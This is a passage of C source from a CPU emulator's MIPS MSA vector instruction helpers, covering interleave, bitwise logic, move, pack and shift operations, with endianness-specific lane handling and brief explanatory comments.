&(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->b[8] = pws->b[0]; pwd->b[9] = pwt->b[0]; pwd->b[10] = pws->b[1]; pwd->b[11] = pwt->b[1]; pwd->b[12] = pws->b[2]; pwd->b[13] = pwt->b[2]; pwd->b[14] = pws->b[3]; pwd->b[15] = pwt->b[3]; pwd->b[0] = pws->b[4]; pwd->b[1] = pwt->b[4]; pwd->b[2] = pws->b[5]; pwd->b[3] = pwt->b[5]; pwd->b[4] = pws->b[6]; pwd->b[5] = pwt->b[6]; pwd->b[6] = pws->b[7]; pwd->b[7] = pwt->b[7]; #else pwd->b[15] = pws->b[7]; pwd->b[14] = pwt->b[7]; pwd->b[13] = pws->b[6]; pwd->b[12] = pwt->b[6]; pwd->b[11] = pws->b[5]; pwd->b[10] = pwt->b[5]; pwd->b[9] = pws->b[4]; pwd->b[8] = pwt->b[4]; pwd->b[7] = pws->b[3]; pwd->b[6] = pwt->b[3]; pwd->b[5] = pws->b[2]; pwd->b[4] = pwt->b[2]; pwd->b[3] = pws->b[1]; pwd->b[2] = pwt->b[1]; pwd->b[1] = pws->b[0]; pwd->b[0] = pwt->b[0]; #endif } void helper_msa_ilvr_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->h[4] = pws->h[0]; pwd->h[5] = pwt->h[0]; pwd->h[6] = pws->h[1]; pwd->h[7] = pwt->h[1]; pwd->h[0] = pws->h[2]; pwd->h[1] = pwt->h[2]; pwd->h[2] = pws->h[3]; pwd->h[3] = pwt->h[3]; #else pwd->h[7] = pws->h[3]; pwd->h[6] = pwt->h[3]; pwd->h[5] = pws->h[2]; pwd->h[4] = pwt->h[2]; pwd->h[3] = pws->h[1]; pwd->h[2] = pwt->h[1]; pwd->h[1] = pws->h[0]; pwd->h[0] = pwt->h[0]; #endif } void helper_msa_ilvr_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->w[2] = pws->w[0]; pwd->w[3] = pwt->w[0]; pwd->w[0] = pws->w[1]; pwd->w[1] = pwt->w[1]; #else pwd->w[3] = pws->w[1]; pwd->w[2] = pwt->w[1]; pwd->w[1] = pws->w[0]; pwd->w[0] = pwt->w[0]; #endif } void helper_msa_ilvr_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[1] = pws->d[0]; pwd->d[0] = pwt->d[0]; } /* * Logic * ----- * * +---------------+----------------------------------------------------------+ * | AND.V | Vector Logical And | * | NOR.V | Vector Logical Negated Or | * | OR.V | Vector Logical Or | * | XOR.V | Vector Logical Exclusive Or | * +---------------+----------------------------------------------------------+ */ void helper_msa_and_v(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = pws->d[0] & pwt->d[0]; pwd->d[1] = pws->d[1] & pwt->d[1]; } void helper_msa_nor_v(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = ~(pws->d[0] | pwt->d[0]); pwd->d[1] = ~(pws->d[1] | pwt->d[1]); } void helper_msa_or_v(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = pws->d[0] | pwt->d[0]; pwd->d[1] = pws->d[1] | pwt->d[1]; } void helper_msa_xor_v(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); 
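/*
 * Bitwise logic is element-size agnostic, so AND.V, NOR.V, OR.V and
 * XOR.V all operate directly on the two 64-bit doublewords; no
 * per-data-format dispatch is needed.
 */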
pwd->d[0] = pws->d[0] ^ pwt->d[0]; pwd->d[1] = pws->d[1] ^ pwt->d[1]; } /* * Move * ---- * * +---------------+----------------------------------------------------------+ * | MOVE.V | Vector Move | * +---------------+----------------------------------------------------------+ */ static inline void msa_move_v(wr_t *pwd, wr_t *pws) { pwd->d[0] = pws->d[0]; pwd->d[1] = pws->d[1]; } void helper_msa_move_v(CPUMIPSState *env, uint32_t wd, uint32_t ws) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); msa_move_v(pwd, pws); } /* * Pack * ---- * * +---------------+----------------------------------------------------------+ * | PCKEV.B | Vector Pack Even (byte) | * | PCKEV.H | Vector Pack Even (halfword) | * | PCKEV.W | Vector Pack Even (word) | * | PCKEV.D | Vector Pack Even (doubleword) | * | PCKOD.B | Vector Pack Odd (byte) | * | PCKOD.H | Vector Pack Odd (halfword) | * | PCKOD.W | Vector Pack Odd (word) | * | PCKOD.D | Vector Pack Odd (doubleword) | * | VSHF.B | Vector Data Preserving Shuffle (byte) | * | VSHF.H | Vector Data Preserving Shuffle (halfword) | * | VSHF.W | Vector Data Preserving Shuffle (word) | * | VSHF.D | Vector Data Preserving Shuffle (doubleword) | * +---------------+----------------------------------------------------------+ */ void helper_msa_pckev_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->b[8] = pws->b[9]; pwd->b[10] = pws->b[13]; pwd->b[12] = pws->b[1]; pwd->b[14] = pws->b[5]; pwd->b[0] = pwt->b[9]; pwd->b[2] = pwt->b[13]; pwd->b[4] = pwt->b[1]; pwd->b[6] = pwt->b[5]; pwd->b[9] = pws->b[11]; pwd->b[13] = pws->b[3]; pwd->b[1] = pwt->b[11]; pwd->b[5] = pwt->b[3]; pwd->b[11] = pws->b[15]; pwd->b[3] = pwt->b[15]; pwd->b[15] = pws->b[7]; pwd->b[7] = pwt->b[7]; #else pwd->b[15] = pws->b[14]; pwd->b[13] = pws->b[10]; pwd->b[11] = pws->b[6]; pwd->b[9] = pws->b[2]; pwd->b[7] = pwt->b[14]; pwd->b[5] = pwt->b[10]; pwd->b[3] = pwt->b[6]; pwd->b[1] = pwt->b[2]; pwd->b[14] = pws->b[12]; pwd->b[10] = pws->b[4]; pwd->b[6] = pwt->b[12]; pwd->b[2] = pwt->b[4]; pwd->b[12] = pws->b[8]; pwd->b[4] = pwt->b[8]; pwd->b[8] = pws->b[0]; pwd->b[0] = pwt->b[0]; #endif } void helper_msa_pckev_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->h[4] = pws->h[5]; pwd->h[6] = pws->h[1]; pwd->h[0] = pwt->h[5]; pwd->h[2] = pwt->h[1]; pwd->h[5] = pws->h[7]; pwd->h[1] = pwt->h[7]; pwd->h[7] = pws->h[3]; pwd->h[3] = pwt->h[3]; #else pwd->h[7] = pws->h[6]; pwd->h[5] = pws->h[2]; pwd->h[3] = pwt->h[6]; pwd->h[1] = pwt->h[2]; pwd->h[6] = pws->h[4]; pwd->h[2] = pwt->h[4]; pwd->h[4] = pws->h[0]; pwd->h[0] = pwt->h[0]; #endif } void helper_msa_pckev_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->w[2] = pws->w[3]; pwd->w[0] = pwt->w[3]; pwd->w[3] = pws->w[1]; pwd->w[1] = pwt->w[1]; #else pwd->w[3] = pws->w[2]; pwd->w[1] = pwt->w[2]; pwd->w[2] = pws->w[0]; pwd->w[0] = pwt->w[0]; #endif } void helper_msa_pckev_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = 
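/*
 * PCKEV packs the even-indexed source elements: in little-endian lane
 * order the destination's low half collects the even elements of wt and
 * the high half the even elements of ws; PCKOD does the same with the
 * odd-indexed elements.
 */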
&(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[1] = pws->d[0]; pwd->d[0] = pwt->d[0]; } void helper_msa_pckod_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->b[7] = pwt->b[6]; pwd->b[5] = pwt->b[2]; pwd->b[3] = pwt->b[14]; pwd->b[1] = pwt->b[10]; pwd->b[15] = pws->b[6]; pwd->b[13] = pws->b[2]; pwd->b[11] = pws->b[14]; pwd->b[9] = pws->b[10]; pwd->b[6] = pwt->b[4]; pwd->b[2] = pwt->b[12]; pwd->b[14] = pws->b[4]; pwd->b[10] = pws->b[12]; pwd->b[4] = pwt->b[0]; pwd->b[12] = pws->b[0]; pwd->b[0] = pwt->b[8]; pwd->b[8] = pws->b[8]; #else pwd->b[0] = pwt->b[1]; pwd->b[2] = pwt->b[5]; pwd->b[4] = pwt->b[9]; pwd->b[6] = pwt->b[13]; pwd->b[8] = pws->b[1]; pwd->b[10] = pws->b[5]; pwd->b[12] = pws->b[9]; pwd->b[14] = pws->b[13]; pwd->b[1] = pwt->b[3]; pwd->b[5] = pwt->b[11]; pwd->b[9] = pws->b[3]; pwd->b[13] = pws->b[11]; pwd->b[3] = pwt->b[7]; pwd->b[11] = pws->b[7]; pwd->b[7] = pwt->b[15]; pwd->b[15] = pws->b[15]; #endif } void helper_msa_pckod_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->h[3] = pwt->h[2]; pwd->h[1] = pwt->h[6]; pwd->h[7] = pws->h[2]; pwd->h[5] = pws->h[6]; pwd->h[2] = pwt->h[0]; pwd->h[6] = pws->h[0]; pwd->h[0] = pwt->h[4]; pwd->h[4] = pws->h[4]; #else pwd->h[0] = pwt->h[1]; pwd->h[2] = pwt->h[5]; pwd->h[4] = pws->h[1]; pwd->h[6] = pws->h[5]; pwd->h[1] = pwt->h[3]; pwd->h[5] = pws->h[3]; pwd->h[3] = pwt->h[7]; pwd->h[7] = pws->h[7]; #endif } void helper_msa_pckod_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->w[1] = pwt->w[0]; pwd->w[3] = pws->w[0]; pwd->w[0] = pwt->w[2]; pwd->w[2] = pws->w[2]; #else pwd->w[0] = pwt->w[1]; pwd->w[2] = pws->w[1]; pwd->w[1] = pwt->w[3]; pwd->w[3] = pws->w[3]; #endif } void helper_msa_pckod_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = pwt->d[1]; pwd->d[1] = pws->d[1]; } /* * Shift * ----- * * +---------------+----------------------------------------------------------+ * | SLL.B | Vector Shift Left (byte) | * | SLL.H | Vector Shift Left (halfword) | * | SLL.W | Vector Shift Left (word) | * | SLL.D | Vector Shift Left (doubleword) | * | SRA.B | Vector Shift Right Arithmetic (byte) | * | SRA.H | Vector Shift Right Arithmetic (halfword) | * | SRA.W | Vector Shift Right Arithmetic (word) | * | SRA.D | Vector Shift Right Arithmetic (doubleword) | * | SRAR.B | Vector Shift Right Arithmetic Rounded (byte) | * | SRAR.H | Vector Shift Right Arithmetic Rounded (halfword) | * | SRAR.W | Vector Shift Right Arithmetic Rounded (word) | * | SRAR.D | Vector Shift Right Arithmetic Rounded (doubleword) | * | SRL.B | Vector Shift Right Logical (byte) | * | SRL.H | Vector Shift Right Logical (halfword) | * | SRL.W | Vector Shift Right Logical (word) | * | SRL.D | Vector Shift Right Logical (doubleword) | * | SRLR.B | Vector Shift Right Logical Rounded (byte) | * | SRLR.H | Vector Shift Right Logical Rounded (halfword) | * | SRLR.W | Vector 
Shift Right Logical Rounded (word) | * | SRLR.D | Vector Shift Right Logical Rounded (doubleword) | * +---------------+----------------------------------------------------------+ */ static inline int64_t msa_sll_df(uint32_t df, int64_t arg1, int64_t arg2) { int32_t b_arg2 = BIT_POSITION(arg2, df); return arg1 << b_arg2; } void helper_msa_sll_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_sll_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_sll_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_sll_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_sll_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_sll_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_sll_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_sll_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_sll_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_sll_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_sll_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_sll_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_sll_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_sll_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_sll_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_sll_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_sll_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_sll_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_sll_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_sll_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_sll_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_sll_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_sll_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_sll_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_sll_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_sll_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_sll_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_sll_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_sll_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_sll_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_sll_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_sll_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_sll_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_sll_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_sra_df(uint32_t df, int64_t arg1, int64_t arg2) { int32_t b_arg2 = BIT_POSITION(arg2, df); return arg1 >> b_arg2; } void helper_msa_sra_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_sra_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_sra_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_sra_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_sra_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_sra_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_sra_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = 
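/*
 * The shift count is reduced modulo the element width by BIT_POSITION
 * (defined earlier in this file), so a byte-lane shift by 9 behaves as
 * a shift by 1.
 */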
msa_sra_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_sra_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_sra_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_sra_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_sra_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_sra_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_sra_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_sra_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_sra_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_sra_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_sra_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_sra_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_sra_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_sra_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_sra_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_sra_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_sra_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_sra_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_sra_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_sra_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_sra_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_sra_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_sra_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_sra_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_sra_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_sra_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_sra_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_srar_df(uint32_t df, int64_t arg1, int64_t arg2) { int32_t b_arg2 = BIT_POSITION(arg2, df); if (b_arg2 == 0) { return arg1; } else { int64_t r_bit = (arg1 >> (b_arg2 - 1)) & 1; return (arg1 >> b_arg2) + r_bit; } } void helper_msa_srar_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_srar_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_srar_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_srar_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_srar_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_srar_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_srar_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_srar_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_srar_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_srar_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_srar_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_srar_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_srar_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_srar_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_srar_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_srar_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_srar_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_srar_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); 
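/*
 * SRAR rounds to nearest by adding back the last bit shifted out:
 * srar(-5, 1) computes (-5 >> 1) + ((-5 >> 0) & 1) = -3 + 1 = -2,
 * where plain SRA would give -3.
 */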
pwd->h[0] = msa_srar_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_srar_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_srar_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_srar_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_srar_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_srar_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_srar_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_srar_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_srar_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_srar_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_srar_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_srar_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_srar_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_srar_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_srar_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_srar_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_srl_df(uint32_t df, int64_t arg1, int64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); int32_t b_arg2 = BIT_POSITION(arg2, df); return u_arg1 >> b_arg2; } void helper_msa_srl_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_srl_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_srl_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_srl_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_srl_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_srl_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_srl_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_srl_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_srl_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_srl_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_srl_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_srl_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_srl_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_srl_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_srl_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_srl_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_srl_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_srl_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_srl_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_srl_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_srl_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_srl_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_srl_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_srl_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_srl_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_srl_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_srl_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_srl_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_srl_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_srl_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = 
msa_srl_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_srl_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_srl_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_srl_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_srlr_df(uint32_t df, int64_t arg1, int64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); int32_t b_arg2 = BIT_POSITION(arg2, df); if (b_arg2 == 0) { return u_arg1; } else { uint64_t r_bit = (u_arg1 >> (b_arg2 - 1)) & 1; return (u_arg1 >> b_arg2) + r_bit; } } void helper_msa_srlr_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); 